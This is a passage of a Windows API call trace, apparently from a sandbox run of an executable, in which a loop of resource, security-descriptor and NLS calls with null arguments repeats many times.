GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.969] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.969] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.969] LockResource (hResData=0x0) returned 0x0 [0069.969] FreeResource (hResData=0x0) returned 0 [0069.969] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.969] LockResource (hResData=0x0) returned 0x0 [0069.969] FreeResource (hResData=0x0) returned 0 [0069.969] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.969] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.969] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.969] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.969] LockResource (hResData=0x0) returned 0x0 [0069.969] FreeResource (hResData=0x0) returned 0 [0069.969] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.970] LockResource (hResData=0x0) returned 0x0 [0069.970] FreeResource (hResData=0x0) returned 0 [0069.970] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.970] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.970] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.970] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.970] LockResource (hResData=0x0) returned 0x0 [0069.970] FreeResource (hResData=0x0) returned 0 [0069.970] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.970] LockResource (hResData=0x0) returned 0x0 [0069.970] FreeResource (hResData=0x0) returned 0 [0069.970] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.970] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.970] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.970] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.970] LockResource (hResData=0x0) returned 0x0 [0069.970] FreeResource (hResData=0x0) returned 0 [0069.970] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.970] LockResource (hResData=0x0) returned 0x0 [0069.970] FreeResource (hResData=0x0) returned 0 [0069.970] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.970] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.970] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.970] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.970] LockResource (hResData=0x0) returned 0x0 [0069.970] FreeResource (hResData=0x0) returned 0 [0069.970] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.970] LockResource (hResData=0x0) returned 0x0 [0069.970] FreeResource (hResData=0x0) returned 0 [0069.971] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.971] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.971] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.971] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.971] LockResource (hResData=0x0) returned 0x0 [0069.971] FreeResource (hResData=0x0) returned 0 [0069.971] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.971] LockResource (hResData=0x0) returned 0x0 [0069.971] FreeResource (hResData=0x0) returned 0 [0069.971] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.971] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.971] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.971] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.971] LockResource (hResData=0x0) returned 0x0 [0069.971] FreeResource (hResData=0x0) returned 0 [0069.971] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.971] LockResource (hResData=0x0) returned 0x0 [0069.971] FreeResource (hResData=0x0) returned 0 [0069.971] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.971] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.971] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.971] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.971] LockResource (hResData=0x0) returned 0x0 [0069.971] FreeResource (hResData=0x0) returned 0 [0069.971] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.971] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.971] LockResource (hResData=0x0) returned 0x0 [0069.971] FreeResource (hResData=0x0) returned 0 [0069.971] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.971] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.971] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.972] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.972] LockResource (hResData=0x0) returned 0x0 [0069.972] FreeResource (hResData=0x0) returned 0 [0069.972] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.972] LockResource (hResData=0x0) returned 0x0 [0069.972] FreeResource (hResData=0x0) returned 0 [0069.972] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.972] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.972] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.972] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.972] LockResource (hResData=0x0) returned 0x0 [0069.972] FreeResource (hResData=0x0) returned 0 [0069.972] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.972] LockResource (hResData=0x0) returned 0x0 [0069.972] FreeResource (hResData=0x0) returned 0 [0069.972] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.972] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.972] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.972] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.972] LockResource (hResData=0x0) returned 0x0 [0069.972] FreeResource (hResData=0x0) returned 0 [0069.972] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.972] LockResource (hResData=0x0) returned 0x0 [0069.972] FreeResource (hResData=0x0) returned 0 [0069.972] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.972] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.972] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.972] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.972] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.972] LockResource (hResData=0x0) returned 0x0 [0069.973] FreeResource (hResData=0x0) returned 0 [0069.973] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.973] LockResource (hResData=0x0) returned 0x0 [0069.973] FreeResource (hResData=0x0) returned 0 [0069.973] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.973] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.973] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.973] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.973] LockResource (hResData=0x0) returned 0x0 [0069.973] FreeResource (hResData=0x0) returned 0 [0069.973] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.973] LockResource (hResData=0x0) returned 0x0 [0069.973] FreeResource (hResData=0x0) returned 0 [0069.973] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.973] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.973] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.973] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.973] LockResource (hResData=0x0) returned 0x0 [0069.973] FreeResource (hResData=0x0) returned 0 [0069.973] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.973] LockResource (hResData=0x0) returned 0x0 [0069.973] FreeResource (hResData=0x0) returned 0 [0069.973] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.973] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.973] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.973] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.973] LockResource (hResData=0x0) returned 0x0 [0069.973] FreeResource (hResData=0x0) returned 0 [0069.973] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.973] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.973] LockResource (hResData=0x0) returned 0x0 [0069.974] FreeResource (hResData=0x0) returned 0 [0069.974] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.974] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.974] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.974] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.974] LockResource (hResData=0x0) returned 0x0 [0069.974] FreeResource (hResData=0x0) returned 0 [0069.974] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.974] LockResource (hResData=0x0) returned 0x0 [0069.974] FreeResource (hResData=0x0) returned 0 [0069.974] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.974] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.974] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.974] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.974] LockResource (hResData=0x0) returned 0x0 [0069.974] FreeResource (hResData=0x0) returned 0 [0069.974] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.974] LockResource (hResData=0x0) returned 0x0 [0069.974] FreeResource (hResData=0x0) returned 0 [0069.974] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.974] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.974] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.974] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.974] LockResource (hResData=0x0) returned 0x0 [0069.974] FreeResource (hResData=0x0) returned 0 [0069.974] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.974] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.974] LockResource (hResData=0x0) returned 0x0 [0069.974] FreeResource (hResData=0x0) returned 0 [0069.974] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.974] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.975] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.975] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.975] LockResource (hResData=0x0) returned 0x0 [0069.975] FreeResource (hResData=0x0) returned 0 [0069.975] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.975] LockResource (hResData=0x0) returned 0x0 [0069.975] FreeResource (hResData=0x0) returned 0 [0069.975] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.975] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.975] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.975] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.975] LockResource (hResData=0x0) returned 0x0 [0069.975] FreeResource (hResData=0x0) returned 0 [0069.975] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.975] LockResource (hResData=0x0) returned 0x0 [0069.975] FreeResource (hResData=0x0) returned 0 [0069.975] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.975] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.975] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.975] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.975] LockResource (hResData=0x0) returned 0x0 [0069.975] FreeResource (hResData=0x0) returned 0 [0069.975] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.975] LockResource (hResData=0x0) returned 0x0 [0069.975] FreeResource (hResData=0x0) returned 0 [0069.975] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.975] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.975] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.975] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.975] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.976] LockResource (hResData=0x0) returned 0x0 [0069.976] FreeResource (hResData=0x0) returned 0 [0069.976] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.976] LockResource (hResData=0x0) returned 0x0 [0069.976] FreeResource (hResData=0x0) returned 0 [0069.976] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.976] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.976] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.976] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.976] LockResource (hResData=0x0) returned 0x0 [0069.976] FreeResource (hResData=0x0) returned 0 [0069.976] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.976] LockResource (hResData=0x0) returned 0x0 [0069.976] FreeResource (hResData=0x0) returned 0 [0069.976] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.976] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.976] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.976] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.976] LockResource (hResData=0x0) returned 0x0 [0069.976] FreeResource (hResData=0x0) returned 0 [0069.976] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.976] LockResource (hResData=0x0) returned 0x0 [0069.976] FreeResource (hResData=0x0) returned 0 [0069.976] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.976] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.976] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.976] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.976] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.976] LockResource (hResData=0x0) returned 0x0 [0069.976] FreeResource (hResData=0x0) returned 0 [0069.976] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.977] LockResource (hResData=0x0) returned 0x0 [0069.977] FreeResource (hResData=0x0) returned 0 [0069.977] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.977] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.977] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.977] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.977] LockResource (hResData=0x0) returned 0x0 [0069.977] FreeResource (hResData=0x0) returned 0 [0069.977] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.977] LockResource (hResData=0x0) returned 0x0 [0069.977] FreeResource (hResData=0x0) returned 0 [0069.977] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.977] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: 